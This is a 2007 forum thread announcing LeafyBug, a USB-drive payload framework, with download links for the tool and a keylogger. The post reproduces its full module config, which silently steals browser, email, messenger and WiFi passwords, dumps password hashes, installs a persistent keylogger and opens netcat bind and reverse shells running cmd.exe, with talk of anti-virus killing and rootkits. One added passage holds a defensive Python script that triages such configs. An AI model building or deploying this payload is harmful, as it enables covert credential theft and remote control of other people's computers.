twsSentinel Posted May 29, 2007

The LeafyBug - A new advancement based off the SwitchBlade PoC.

Update: 6.09.2007

Well guys, I gotta say I'm sorry. The launch of the LeafyBug did not go quite as planned. I've been offered a partnership in a new startup eBusiness, so that has taken 100% of my time this past week. That and school. But I've decided to release the files. However, I did not get to finish all the features I wanted, specifically the "Loader" application, so I have not included this in the downloads yet. Once done, the loader offers new solutions to the payload execution. First off, it detects if .NET is installed on the computer; therefore, if the necessary dependencies are not found, the payload won't run. You can even specify to run a backup payload! It has a few other features to assist in run customization.

Anyway, without further wait:

http://tws.serveftp.org/software/LeafyBug/LeafyBug.zip << Framework exe
http://tws.serveftp.org/software/LeafyBug/...ditor.zip << Payload Editor
http://tws.serveftp.org/software/LeafyBug/...ource.zip << C# Source code for the framework
http://tws.serveftp.org/software/LeafyBug/...ogger.zip << Small .NET Keylogger I made which works on x86 & x64. Does not use WinAPI Hooks.

*More info on .NETLogger can be found at: http://www.codeproject.com/useritems/NetKeyLogger.asp. I've released it open-source there.

Please guys, accept my apologies on this release. I really intended to have it 100% finished, all features. I will finish the project, but I can't really give an ETA. The LbLoader application will be released within the next week or so. Those files are being hosted directly off my PC server, so if you want to spread them to RapidShare, be my guest. :)

What is the LeafyBug?

All this time here at Hak5.org, we've had several U3 payloads come and go. Most of us found one we liked or created our own. However, the LeafyBug brings a whole new aspect to the table.
The LeafyBug is NOT a payload; it is a payload framework which allows you to extend the Switchblade's concept to a greater extent. Think of it this way: the LeafyBug is like the payload engine. The payloads themselves are only made up of 2 ini setup files. The QuietRiot v2.1.5 is the first payload for this new framework.

;***********************************************
;* QuietRiot v2.1.5 Modules
;* LeafyBug Payload
;* Date: 5/25/2007
;* Code: _DmG_
;***********************************************
;* ***************************************************************************************************************
;* Creating Custom Modules:
;*
;* To create a module you must specify certain variables...
;* =-----------------------------------------------------------------------------------------------------------------=
;* | Var      | Value                                                                                  | Required |
;* =-----------------------------------------------------------------------------------------------------------------=
;* Enabled  = Enabled or Disabled (Write 'true' or 'false')                                               YES
;* Filename = EXE_NAME ("Name of actual exe's name") (Ex. keyLogger.exe, netstat)                          YES
;* Mode     = (Choices either 1,2,3)                                                                       YES
;*            1 = SystemInfo (Ex. netstat, ipconfig) Used for system executables only
;*            2 = Executable (The exe will be run from the usb device)
;*            3 = Executable (The exe will be copied to target. If RootKit is enabled, it will
;*                run under its protection.)
;* =-----------------------------------------------------------------------------------------------------------------=
;* FileDIR  = Path to copy exe to if 'Mode' == 2 or 3 (Default. Leave empty)                               NO
;* PreArgs  = Custom export args (This string will be sent after the EXE_NAME &                            NO
;*            before the output filename) Nirsoft applications generally use '/stext' to
;*            output into a log, but some apps require something different. See the
;*            "Firefox Passwords" module for an example.
;* PostArgs = Custom export args                                                                           NO
;*            If Mode == 2: This string will be sent after the output filename. Ex. See "AdapterWatch".
;*            If Mode == 3: Use this string to set the name for the registry key. Ex. See "KeyLogger".
;* x64      = x64 Flag! (If you know an app is incompatible with an x64 OS, then set to "true".            NO
;*            The app won't run.) (Default. Leave empty or false) (See "pwdump" module as an example.)
;* x64File  = x64 Alternative EXE Support (If you have two executables, one for x86 and one for x64,       NO
;*            you can set the EXE_NAME to the file here.)
;*            (See "CurrentPorts" & "WifiKeys" modules as examples.)
;* Output   = If the application will output text, leave blank or set to true, otherwise, false.           NO
;*            (See "NetCat" or "Keylogger", these programs don't require the app to finish.)
;* =-----------------------------------------------------------------------------------------------------------------=
;* ***************************************************************************************************************
;PRE-CONFIGURED VARIABLES: Use these to aid in settings.
;
;$DRIVE_DIR$    » Drive the payload executes from.
;$MACHINE_NAME$ » Target computer's name.
;$SYSTEM$       » Target computer's system32 directory.
;$DATE$         » Date of execution.
;$TIME$         » Time of execution.
;$NC_PORT$      » Port number specified in config file.
;$NC_RVS_IP$    » Reverse shell IP.
;$NC_RVS_PORT$  » Reverse shell port.

[Anti-Virus Killer]
Enabled=false
Filename=
Mode=
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=false

[NetStat]
Enabled=false
Filename=netstat
Mode=1
FileDir=$FILE_DIR$
PreArgs=-n
PostArgs=
x64=
x64File=
Output=

[AdapterWatch]
Enabled=true
Filename=quietriot_awatch.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=/stab
PostArgs=1
x64=
x64File=
Output=

[CurrentPorts]
Enabled=true
Filename=quietriot_cports.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=true
x64File=quietriot_cports64.exe
Output=

[Firefox Passwords]
Enabled=true
Filename=quietriot_FirePassword.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=>>
PostArgs=
x64=
x64File=
Output=

[Internet Explorer]
Enabled=true
Filename=quietriot_iepv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Internet Explorer History]
Enabled=true
Filename=quietriot_iehv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Product Keys]
Enabled=true
Filename=quietriot_ProduKey.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Instant Messenger]
Enabled=true
Filename=quietriot_mspass.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[E-Mail Accounts]
Enabled=true
Filename=quietriot_mailpv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Windows Updates]
Enabled=true
Filename=quietriot_wul.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[Protected Storage]
Enabled=true
Filename=quietriot_pspv.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=
Output=

[WiFi Keys]
Enabled=true
Filename=quietriot_WirelessKeyView.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=
PostArgs=
x64=
x64File=quietriot_WirelessKeyView64.exe
Output=

[KeyLogger]
Enabled=true
Filename=quietriot_NetLogger.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-m hour
PostArgs=MSKL
x64=
x64File=
Output=false

[PwDump]
Enabled=true
Filename=quietriot_pwdump.exe
Mode=2
FileDir=$FILE_DIR$
PreArgs=>>
PostArgs=
x64=true
x64File=
Output=

[NetCat BindShell]
Enabled=true
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=-L -p $NC_PORT$ -d -e cmd.exe
PostArgs=MSNCBS
x64=
x64File=
Output=false

[NetCat ReverseShell]
Enabled=false
Filename=quietriot_nc.exe
Mode=3
FileDir=$FILE_DIR$
PreArgs=$NC_RVS_IP$ $NC_RVS_PORT$ -e cmd.exe
PostArgs=MSNCRS
x64=
x64File=
Output=false

Oooohhh, Aaahhhhh ... What's so damn special about it?!? No more shell coding; you have the power of the .NET Framework without even coding one thing. The software is already in place ... just create 2 simple files with the LeafyBug Editor. This project is nearing completion. All code is pretty much done. Just a few more quick features to add.

Here's why to migrate to the LeafyBug:

- Full WinOS compatibility and customization - x86 & x64
- 100% hidden running ... other payloads would show up on x64
- LeafyBug SmartTags :: Be able to use the .NET Framework without even coding. Hardcoded SmartTags like ($MACHINE_NAME$, $DATE$) will give you current information on each run.
- Auto-detects system architecture, allows you to specify 32- & 64-bit apps for each module, and automatically executes the proper one.
- RootKit ability
- Easy to create, expand, simplify with no code whatsoever. Add new modules with ease in the editor.
- Customize each module down to a T how it will run and execute.
- Installation is simple; place whatever you want in any drive/directory.
- U3 & Non-U3 compliant
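For anyone who finds one of these payloads on a drive during an investigation, the module format above is enough to work out what it would have done without running it. The following triage script is an added example, not part of LeafyBug or QuietRiot; it parses a modules .ini using the field meanings from the header comment (Mode 3 copies a file to the host and uses PostArgs as a registry value name, x64=true without an x64File means the module is skipped on 64-bit hosts, Output=false means the tool is left running) and lists the host artifacts to sweep for. The embedded sample is a constructed cut-down copy of the module list in the post.

```python
# Added example (not LeafyBug code): triage a recovered QuietRiot modules .ini
# and report what each enabled module would do, without executing anything.
import configparser
from dataclasses import dataclass

@dataclass
class Finding:
    name: str
    mode: str           # 1 = system binary, 2 = run from drive, 3 = copied to host
    exe: str            # binary named in Filename
    x64_exe: str        # alternative binary from x64File, if any
    runs_on_x64: bool   # x64=true with no x64File means the module is skipped on x64
    registry_name: str  # in Mode 3, PostArgs is the registry value name used
    detached: bool      # Output=false: the tool keeps running after the payload exits

def parse_modules(ini_text: str) -> list[Finding]:
    # interpolation=None keeps $TAG$ placeholders literal instead of raising
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    out = []
    for sec in cp.sections():
        m = cp[sec]
        if m.get("enabled", "").strip().lower() != "true":
            continue  # disabled modules never run
        mode, x64_exe = m.get("mode", "").strip(), m.get("x64file", "").strip()
        x64_flag = m.get("x64", "").strip().lower() == "true"
        out.append(Finding(
            name=sec, mode=mode, exe=m.get("filename", "").strip(), x64_exe=x64_exe,
            runs_on_x64=not (x64_flag and not x64_exe),
            registry_name=m.get("postargs", "").strip() if mode == "3" else "",
            detached=m.get("output", "").strip().lower() == "false"))
    return out

def host_artifacts(findings: list[Finding]) -> dict:
    """Files and registry value names to sweep for on a host the payload ran on."""
    dropped = [f for f in findings if f.mode == "3"]
    return {"files": sorted(f.exe for f in dropped),
            "registry_values": sorted(f.registry_name for f in dropped)}

# Constructed sample: a cut-down copy of the module list in the post above.
SAMPLE_INI = "\n".join([
    "[CurrentPorts]", "Enabled=true", "Filename=quietriot_cports.exe", "Mode=2",
    "x64=true", "x64File=quietriot_cports64.exe",
    "[PwDump]", "Enabled=true", "Filename=quietriot_pwdump.exe", "Mode=2", "PreArgs=>>", "x64=true",
    "[KeyLogger]", "Enabled=true", "Filename=quietriot_NetLogger.exe", "Mode=3", "PostArgs=MSKL", "Output=false",
    "[NetStat]", "Enabled=false", "Filename=netstat", "Mode=1",
])

if __name__ == "__main__":
    for f in parse_modules(SAMPLE_INI):
        print(f)
    print(host_artifacts(parse_modules(SAMPLE_INI)))
```

Run against the real file from the drive, only the KeyLogger and NetCat BindShell modules are Mode 3, so those two executables and the MSKL/MSNCBS registry value names are the first things to look for on the affected host.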
thespy Posted May 29, 2007

Dude, looks great, can't wait for the release.
setzer1411 Posted May 30, 2007

Looks badass, this will make life simple for newbs and the vets alike. Thx man.
lixo Posted June 5, 2007

Sounds pretty good. Any date yet for a release?
W4RP3D Posted June 5, 2007

Wow, that looks really decent, absolutely great idea. What's the ETA?
Darren Kitchen Posted June 5, 2007

Wiki it up man... And when can we book you as a guest on Hak5Live?
twsSentinel (Author) Posted June 6, 2007

Hey guys .. I'll release it either tomorrow or in the next couple of days. There are a couple of things I'd like to see implemented. Also, I have completely lost my U3 Drive (OMG!). Sucks. I have no idea what happened to it. So I will be unable to test any U3 capabilities or create a U3 Package Installer. Hopefully I'll buy a new drive within a week.

I'm also still undecided about releasing a rootkit with the QuietRiot. The LeafyBug has the ability to use the hxdef RK, but I might just leave it up to the individuals to modify the HxDef rootkit. But we'll see.

On another note, I'm working with the creator of PwDump v6.5 (foofus.net) to create an x64-compatible version. I will release the Lb/QuietRiot before this gets built, but hopefully an x64 version will be out soon. If you've ever tried to run it in a 64-bit environment, the application hangs.

Anyways ... thanks for the support guys. Sorry for the wait!
twsSentinel (Author) Posted June 10, 2007

LeafyBug has been released (look up top at the first post). Please read the update first though. Thanks guys for your support!
W4RP3D Posted June 10, 2007

I might just be being stupid (I've been up since 5am and worked an 11 hr day), but I'm needing a username and password?
twsSentinel (Author) Posted June 10, 2007

Oh crap .. sorry guys! ... I forgot to config IIS for those files. *fixed*